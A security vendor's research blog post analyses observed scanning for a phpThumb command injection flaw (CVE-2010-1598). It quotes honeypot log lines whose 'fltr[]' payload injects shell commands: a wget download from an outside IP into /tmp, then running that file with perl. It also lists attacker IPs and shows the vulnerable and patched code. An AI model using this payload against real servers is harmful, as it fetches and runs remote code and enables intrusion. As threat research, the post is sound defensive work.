Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More
Get access to immediate incident response assistance.
Get access to immediate incident response assistance.
Trustwave's 2024 Retail Report Series Highlights Alarming E-Commerce Threats and Growing Fraud Against Retailers. Learn More
The SpiderLabs Research Team has identified active scanning for the phpThumb() 'fltr[]' Parameter Command Injection Vulnerability in our web server honeypot logs. Here is the vulnerability info as described by SecurityFocus:
Bugtraq ID: | 39605 |
Class: | Input Validation Error |
CVE: | CVE-2010-1598 |
Remote: | Yes |
Local: | No |
Published: | Apr 21 2010 12:00AM |
Updated: | Nov 22 2011 07:39PM |
Credit: | M4g |
Vulnerable: | phpThumb phpThumb() 1.7.9 Johannes Jarolim Yet Another Photoblog (YAPB) 1.9.26 FLEXIcontent FLEXIcontent 1.5.3cFLEXIcontent FLEXIcontent 1.5.3B |
Here are some Apache access_log examples:
94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/plugins/com-resize/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/Comfy/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/comfy-plus/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/fama/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/victore/phpthumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"94.23.205.180 - - [28/Dec/2011:10:59:34 +0100] "GET /wp-content/themes/wp-max/scripts/phpThumb/phpThumb.php?src=file.jpg&fltr[]=blur|9%20-quality%20%2075%20-interlace%20line%20fail.jpg%20jpeg:fail.jpg%20;%20ls%20-l%20/tmp;wget%20-O%20/tmp/f%2067.19.79.203/f;killall%20-9%20perl;perl%20/tmp/f;%20&phpThumbDebug=9 HTTP/1.1" 404 622 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:8.0) Gecko/20100101 Firefox/8.0"
We have seen scanning from the following hosts:
115.178.22.206116.12.168.232161.139.195.191189.87.233.5195.248.231.180200.134.25.51206.212.253.225213.195.65.16217.79.182.3862.212.67.7770.169.147.2191.121.137.8791.121.151.15591.121.152.10591.121.160.16091.121.168.4591.121.208.19991.121.22.10791.121.3.4191.121.5.21191.121.90.18594.23.10.7694.23.19.18294.23.196.14294.23.205.18094.23.214.10194.23.216.5594.23.230.10394.23.232.19094.23.244.13894.23.27.17094.23.39.1694.23.42.12194.23.47.19894.23.61.47
By appending a semi-colon to the "blur" option of the fltr parameter, they attacker is able to execute OS level commands. Look at the phpthumb.class.php code:
function ImageMagickThumbnailToGD() {... foreach ($this->fltr as $filterkey => $filtercommand) { @list($command, $parameter) = explode('|', $filtercommand, 2); switch ($command) {... case 'blur': if ($this->ImageMagickSwitchAvailable('blur')) { @list($radius) = explode('|', $parameter); $radius = ($radius ? $radius : 1); $commandline .= ' -blur '.$radius; unset($this->fltr[$filterkey]); } break;... $this->DebugMessage('ImageMagick called as ('.$commandline.')', __FILE__, __LINE__); $IMresult = phpthumb_functions::SafeExec($commandline); clearstatcache(); if (@$IMtempSourceFilename && file_exists($IMtempSourceFilename)) { @unlink($IMtempSourceFilename); } if (!@file_exists($IMtempfilename) || !@filesize($IMtempfilename)) { $this->FatalError('ImageMagick failed with message ('.trim($IMresult).')'); $this->DebugMessage('ImageMagick failed with message ('.trim($IMresult).')', __FILE__, __LINE__);...}
This is then evaluated in the phpthumb.functions.php code without any input validation checks for the $command data. The phpthumb CHANGELOG states the following changes for v1.7.10:
v1.7.10 - April 24, 2011 * ImageMagickVersion() returned unknown-version for versions with hyphenated subversion numbers (thanks r34wangØuwaterloo*ca) * replace all ereg* functions with preg* equivalents for PHP v5.3.0+ compatability * Bugfix: security vulnerabilities when used with ImageMagick
The updated "blur" code now enforces both a length restriction and also uses php escapeshellarg function:
case 'blur': if ($this->ImageMagickSwitchAvailable('blur')) { @list($radius) = explode('|', $parameter); $radius = (!empty($radius) ? min(max(intval($radius), 0), 25) : 1); $commandline .= ' -blur '.escapeshellarg($radius); $successfullyProcessedFilters[] = $filterkey; } break;
Trustwave is a globally recognized cybersecurity leader that reduces cyber risk and fortifies organizations against disruptive and damaging cyber threats. Our comprehensive offensive and defensive cybersecurity portfolio detects what others cannot, responds with greater speed and effectiveness, optimizes client investment, and improves security resilience. Learn more about us.
Copyright © 2024 Trustwave Holdings, Inc. All rights reserved.